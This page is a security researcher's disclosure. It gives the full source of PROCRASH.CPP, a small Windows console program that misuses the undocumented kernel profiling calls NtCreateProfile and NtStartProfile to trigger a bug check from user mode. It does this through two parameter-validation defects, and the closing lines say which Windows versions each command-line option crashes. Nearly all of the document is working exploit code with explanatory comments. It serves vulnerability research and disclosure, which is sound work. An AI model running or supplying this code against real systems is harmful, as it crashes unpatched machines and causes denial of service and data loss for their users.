Geoff Chappell, Software Analyst
There follows the one source file, PROCRASH.CPP, for a small console application that demonstrates a Bug Check From User Mode By Profiling. Compile with a separate header, PROFILE.H, of declarations and definitions that Microsoft ordinarily does not provide for user-mode programming.
/* ************************************************************************ * * procrash.cpp * * ************************************************************************ */ /* Begin with the usual headers for user-mode Windows programming and for console output via the C Run-Time Library. Be nice to readers who expect demonstration code to compile with /Wall even if Microsoft's own headers don't. Those who worry about such things likely already know what warnings these numbers select. */ #pragma warning (disable : 4514 4710 4711) #pragma warning (push) #pragma warning (disable : 4668 4820) #define WIN32_LEAN_AND_MEAN 1 #include <windows.h> #include <stdio.h> #pragma warning (pop) /* Some more or less general-purpose support for profiling is available in the Windows Driver Kit (WDK) for kernel-mode programming. For user-mode programming there's little choice but to reproduce from the WDK. Bring it in from a separate header to reduce distraction from the actual program. */ #include "profile.h" /* Ease the use of undocumented functions such as NtCreateProfile by importing them just as for documented API functions. This requires access to an import library for NTDLL. */ #pragma comment (lib, "ntdll.lib") /* ************************************************************************ */ /* Configurable */ /* Profiling specifies a region whose execution is to be sampled recurrently. This profiled region is treated as an array of buckets. Sampling produces an execution count for each bucket. For simplicity, use the fewest possible buckets. */ #define BUCKET_COUNT 1 /* The bucket size must be a power of two - and the BucketSize argument for NtCreateProfile is actually the logarithm of the size in bytes. The smallest bucket that's permitted is 4 bytes. The two demonstrations have different requirements, however. For the ancient defect (demonstration 1), we need that profiling catches some execution anywhere in roughly a quarter of a bucket. Choosing 64 bytes as the bucket size allows 16 bytes for a tight loop plus whatever prolog and epilog code the compiler happens to add. */ #define LOG_BUCKET_SIZE_1 6 /* For demonstration 2, the smallest possible bucket is large enough. */ #define LOG_BUCKET_SIZE_2 2 /* ======================================================================== */ /* Implications and compile-time sanity checking */ /* As noted above, the smallest allowed bucket is 4 bytes. */ #define BUCKET_SIZE_1 (1 << LOG_BUCKET_SIZE_1) #define BUCKET_SIZE_2 (1 << LOG_BUCKET_SIZE_2) C_ASSERT (BUCKET_SIZE_1 >= sizeof (ULONG)); C_ASSERT (BUCKET_SIZE_2 >= sizeof (ULONG)); /* The execution counts go into a buffer. Each execution count is a ULONG. Our choice of BUCKET_COUNT thus determines how big a buffer to provide and the count and size together determine how large a region we can profile. */ #define BUFFER_SIZE (BUCKET_COUNT * sizeof (ULONG)) #define PROFILE_SIZE_1 (BUCKET_COUNT * BUCKET_SIZE_1) #define PROFILE_SIZE_2 (BUCKET_COUNT * BUCKET_SIZE_2) /* For the ancient defect, we ask mischievously to profile a slightly larger region than we should be allowed to. If we don't ask for too much more, we sneak past a defect in the kernel's parameter validation. */ #define PROFILE_EXCESS (BUCKET_SIZE_1 / sizeof (ULONG) - 1) C_ASSERT (PROFILE_EXCESS != 0); /* ************************************************************************ */ /* Supporting data */ /* To make things go wrong, the last execution count for (what we should be allowed to specify as) the profiled region must end on a page boundary. To arrange this, set aside memory that is sure to be large enough to contain BUFFER_SIZE bytes that end at a page boundary. For all imagined use of this demonstration, the page size can reasonably be regarded as well-known. */ #ifndef PAGE_SIZE #define PAGE_SIZE 0x1000 #endif BYTE Buffer [BUFFER_SIZE + PAGE_SIZE]; /* ************************************************************************ */ /* Profiled code */ /* Both demonstrations run a loop until some execution is interrupted for profiling. Aim for as tight a loop as can be without much risk that the compiler eliminates it altogether. For demonstration 1 it's enough just to execute in the excess that we shouldn't be allowed to add to the profiled region. It doesn't matter much what's in the loop, though we get the best chance of trapping execution in the excess if the whole loop fits into the excess. Demonstration 2 is fussier. The profiled region must end at an instruction boundary, the defect being that the instruction that follows the profiled region can get profiled by mistake. The choice of coding below allows that we can learn the address of an instruction in the loop by executing the loop just once without profiling. That we support the building of this code by tools from the WDK brings a small problem: believe it or not, but the WDK has not always come with a header to include for the _ReturnAddress intrinsic. */ extern "C" PVOID _ReturnAddress (VOID); #pragma intrinsic (_ReturnAddress) /* While we're at it with compiler intrinsics, it helps to have another so that the instruction we find is not some little thing that the processor can often execute in zero cycles and thus hardly ever returns to when interrupted. */ extern "C" VOID _ReadWriteBarrier (VOID); #pragma intrinsic (_ReadWriteBarrier) DECLSPEC_NOINLINE PVOID GetReturnAddress (VOID) { return _ReturnAddress (); } DECLSPEC_NOINLINE VOID __fastcall ProfileLoop (UINT Runs, PVOID volatile *Pointer) { do { *Pointer = GetReturnAddress (); _ReadWriteBarrier (); } while (-- Runs != 0); } /* ************************************************************************ */ /* The actual program */ int __cdecl wmain (int argc, PWSTR *argv) { /* Parse the command line to learn which coding error to demonstrate. */ int demo = 0; if (argc == 0) return -1; while (++ argv, -- argc != 0) { PWSTR arg = *argv; if (demo == 0) { if (wcscmp (arg, L"1") == 0) { demo = 1; continue; } if (wcscmp (arg, L"2") == 0) { demo = 2; continue; } } printf ("Invalid parameter %ws\n", arg); return -1; } if (demo == 0) demo = 1; /* From the Buffer that we set aside above, carve out the BUFFER_SIZE bytes that we'll provide for the execution counts. Remember, the distinctive property we want is that these BUFFER_SIZE bytes end at a page boundary. */ PBYTE end = (PBYTE) ALIGN_UP_BY (Buffer + BUFFER_SIZE, PAGE_SIZE); ULONG *buffer = (ULONG *) (end - BUFFER_SIZE); /* The two demonstrations choose the profiled region ever so slightly differently. */ ULONG logbucketsize; PVOID profilebase; ULONG profilesize; if (demo == 1) { logbucketsize = LOG_BUCKET_SIZE_1; /* For the ancient defect, place the whole of the ProfileLoop in our mischievous excess. */ profilebase = (PBYTE) ProfileLoop - PROFILE_SIZE_1; profilesize = PROFILE_SIZE_1 + PROFILE_EXCESS; } else { logbucketsize = LOG_BUCKET_SIZE_2; /* For demonstration 2, contrive to get the profiled region ending at exactly an instruction in the loop. */ PVOID endprofile; ProfileLoop (1, &endprofile); profilebase = (PBYTE) endprofile - PROFILE_SIZE_2; profilesize = PROFILE_SIZE_2; } /* Set up the profiling of execution in the profiled region. By the way, the simplicity of passing -1 to stand for profiling all processors comes with a small burden on 64-bit Windows: we must run a 64-bit build, not a 32-bit build, else the -1 is interpreted as meaning to profile the first 32 processors and NtCreateProfile fails unless there actually are 32 active processors to profile. */ HANDLE hprofile; NTSTATUS status = NtCreateProfile ( &hprofile, GetCurrentProcess (), profilebase, profilesize, logbucketsize, buffer, BUFFER_SIZE, ProfileTime, (KAFFINITY) -1); if (!NT_SUCCESS (status)) { printf ("Error 0x%08X creating profile object\n", (UINT32) status); } else { /* Start the profiling and run the loop. */ status = NtStartProfile (hprofile); if (!NT_SUCCESS (status)) { printf ("Error 0x%08X starting profile\n", (UINT32) status); } else { PVOID p; ProfileLoop (MAXUINT, &p); /* All being "well", we can't get here. While executing the preceding loop, a profile interrupt will occur and the kernel will try to increment an execution count for which no memory has been provided. The expected result is a bug check - indeed, a nasty one for occurring inside a hardware interrupt handler. */ NtStopProfile (hprofile); printf ("Profiling completed\n"); } CloseHandle (hprofile); } return 0; } /* ************************************************************************ */
That’s it! Compile and link to taste.
To crash all Windows versions up to but not including the 1703 release of Windows 10, run procrash 1. Before Windows 8, procrash 2 causes no fault. Some update will soon be released by Microsoft—probably without much description, and surely without attribution—such that new builds of Windows aren’t crashed by either command-line option.